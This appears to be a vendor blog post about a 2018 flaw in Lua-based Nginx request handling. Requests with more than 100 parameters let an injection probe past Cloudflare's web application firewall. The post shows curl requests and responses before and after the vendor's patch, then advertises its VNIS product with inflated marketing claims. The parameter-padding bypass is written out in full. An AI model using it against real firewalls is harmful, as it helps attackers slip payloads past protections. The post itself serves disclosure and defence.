Daniel Farina, an Open Data Security (ODS) researcher, published a study on October 25, 2018. It has been made public that he discovered a security weakness in the Cloudflare platform’s server software (Nginx), which can cause the firewall (WAF - Web Application Firewall) to malfunction, allowing hackers to conduct open network attacks.
VNETWORK was interested in this study because we are also developing a Cloud WAF firewall called VNIS using Nginx server software.
Exactly what sort of vulnerability has popped up?
Nginx’s Lua programming language includes a limit on access to all request information, which can be summarized as follows: To prevent denial of service attacks, up to 100 parameters (parameter comparison) requests are allowed by default (even those with the same name), and extra request arguments are discreetly deleted.
There will be a parameter vulnerability in any firewall built on Nginx utilizing the Lua programming language.
So why is VNIS required to patch this flaw?
Our developers blocked harmful requests coming from the Lua-Nginx vulnerability with new upgrades to protect VNIS users, rather than waiting for Cloudflare to address the flaw.
And it was successful.
The following tests were carried out by VNETWORK programmers:
Before being patched, vulnerability
One parameter to test:
“`curl -i ‘127.0.0.1/?txtSearch=<%21–%23cmd’ -H “Host: demo.1testfire.net”
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 13 Dec 2018 07:08:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
<!DOCTYPE html><html lang=”en”><head><meta charset=”UTF-8″><title>Error Page</title><link rel=”stylesheet” type=”text/css” href=”__assets/css/style.css”><link href=”https://fonts.googleapis.com/css?family=Raleway” rel=”stylesheet”></head><body><div class=”wrapper”><h1>ACCESS DENIED<span>Your request to access demo.1testfire.net was denied</span></h1><p class=”error_info”><span>Incident ID </span>31c75a46e100079d1449f5e4db85d6de</p><p class=”error_info”><span>Your IP </span>127.0.0.1</p><img src=”__assets/img/process_img.png”><div class=”next_Step”><p><span>What happened ?</span>The website you are trying to access is protected against cyber attacks. Your recent action or behavior was flagged as suspicious. Further access to the web server has been denied.</p> <p><span>What can I do ?</span>Please try again in a few minutes. Or, you can directly contact the site owner within Event ID indicated and a description of what you were doing before you were denied access.</p></div><span class=”copyright”>Powered by mlytics.com</span></div></body></html>“`
Experiment with a0-a9, 1010, a total of 100 parameters, then add the 101st parameter.
“`curl-i‘127.0.0.1/?a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1
=1&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3
=3&a3=3&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5
=5&a5=5&a5=5&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7
=7&a7=7&a7=7&a7=7&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a9=9&a9=9&a9=9&a9=9&a9=9&a9
=9&a9=9&a9=9&a9=9&a9=9&<%21–%23cmd’ -H “Host: demo.1testfire.net”HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: Nginx
Date: Thu, 13 Dec 2018 07:20:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2vb4y5453apg1cvpakfjigip; path=/; HttpOnly
Set-Cookie: amSessionId=6207394219; path=/
X-Powered-By: ASP.NET
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml” xml:lang=”en” >
<head id=”_ctl0__ctl0_head”><title>……………….“`
When the request is sent with less than 100 parameters, the Cloudflare firewall can easily intercept it. The Cloudflare firewall, however, becomes passive and incapable of blocking when the parameter passes 100 and reaches the 101st parameter.
Vulnerability after being patched
Test with: 1 parameter
“`curl -i ‘127.0.0.1/?txtSearch=<%21–%23cmd’ -H “Host: demo.1testfire.net”
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 13 Dec 2018 07:08:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
<!DOCTYPE html><html lang=”en”><head><meta charset=”UTF-8″><title>Error Page</title><link rel=”stylesheet” type=”text/css” href=”__assets/css/style.css”><link href=”https://fonts.googleapis.com/css?family=Raleway” rel=”stylesheet”></head><body><div class=”wrapper”><h1>ACCESS DENIED<span>Your request to access demo.1testfire.net was denied</span></h1><p class=”error_info”><span>Incident ID </span>31c75a46e100079d1449f5e4db85d6de</p><p class=”error_info”><span>Your IP </span>127.0.0.1</p><img src=”__assets/img/process_img.png”><div class=”next_Step”><p><span>What happened ?</span>The website you are trying to access is protected against cyber attacks. Your recent action or behavior was flagged as suspicious. Further access to the web server has been denied.</p> <p><span>What can I do ?</span>Please try again in a few minutes. Or, you can directly contact the site owner within Event ID indicated and a description of what you were doing before you were denied access.</p></div><span class=”copyright”>Powered by mlytics.com</span></div></body></html>“`
Experiment with a0-a9,1010 with 100 parameters and add the 101st parameter.
“`curl-i‘127.0.0.1/?a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1
=1&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a4=4&a4
=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a6=6&a6=6&a6=6&a6
=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a8=8&a8=8&a8=8&a8=8&a8=8&a8
=8&a8=8&a8=8&a8=8&a8=8&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&<%21–%23cmd’ -H “Host: demo.1testfire.net”
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 13 Dec 2018 07:18:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
<!DOCTYPE html><html lang=”en”><head><meta charset=”UTF-8″><title>Error Page</title><link rel=”stylesheet” type=”text/css” href=”__assets/css/style.css”><link href=”https://fonts.googleapis.com/css?family=Raleway” rel=”stylesheet”></head><body><div class=”wrapper”><h1>ACCESS DENIED<span>Your request to access demo.1testfire.net was denied</span></h1><p class=”error_info”><span>Incident ID </span>-</p><p class=”error_info”><span>Your IP </span></p><img src=”__assets/img/process_img.png”><div class=”next_Step”><p><span>What happened ?</span>The website you are trying to access is protected against cyber attacks. Your recent action or behavior was flagged as suspicious. Further access to the web server has been denied.</p> <p><span>What can I do ?</span>Please try again in a few minutes. Or, you can directly contact the site owner within Event ID indicated and a description of what you were doing before you were denied access.</p></div><span class=”copyright”>Powered by mlytics.com</span></div></body></html>“`
This will assure optimum security for users with the upgrade to fix VNIS vulnerabilities.
Explore more about VNIS.
VNIS is a platform that offers the greatest security solutions and is combined with a variety of features to enable businesses’ websites not only to be secure but also optimized for transmission speed, allowing users to access the website and would have a better experience.
Cloud-based firewall (Cloud WAF - Web Application Firewall)
VNIS’s comprehensive Cloud WAF solution is cloud-based and distributed across many countries, with the ability to adjust CRS (Core Rule Set) to assist ensure that your website is safe from assaults targeting the web application layer (Layer 7) where all business-critical data is stored. VNIS is also connected with over 2,000 sets of security rules, assisting in the prevention of targeted cyber assaults. Furthermore, based on OWASP (Top 10 OWASP) reports, VNIS firewall can detect and automatically prevent all serious security vulnerabilities such as Broken Access Control, SQL Injection, Cryptographic Failures, and so on, to ensure that your business website is always protected and maintained in the best possible way.
Multi-CDN Content Delivery Network (Multi-CDN Content Delivery Network)
VNIS has a robust Multi-CDN network with over 2,300 points of presence around the world and with CDN bandwidth of up to 2,600 Tbps. With this capability, VNIS can assist corporate websites in simultaneously loading 6 billion visitors. Indirectly verify that the business website is secured from attacks such as DDoS and Botnet that target the network layer (Layer 3) and transport layer (Layer 4). The Multi-CDN from VNIS is coupled with a real user monitoring system (RUM-Real User Monitoring) and intelligent load balancing AI (AI Loadbalancing), which helps organizations manage harmful and malicious access to their websites. ensuring that the website can perform at its best even while it is under assault
To have a trial experience, and learn more information about the website/App anti-exploit service, you can leave your contact information below or call our hotline: (028) 7306 8789.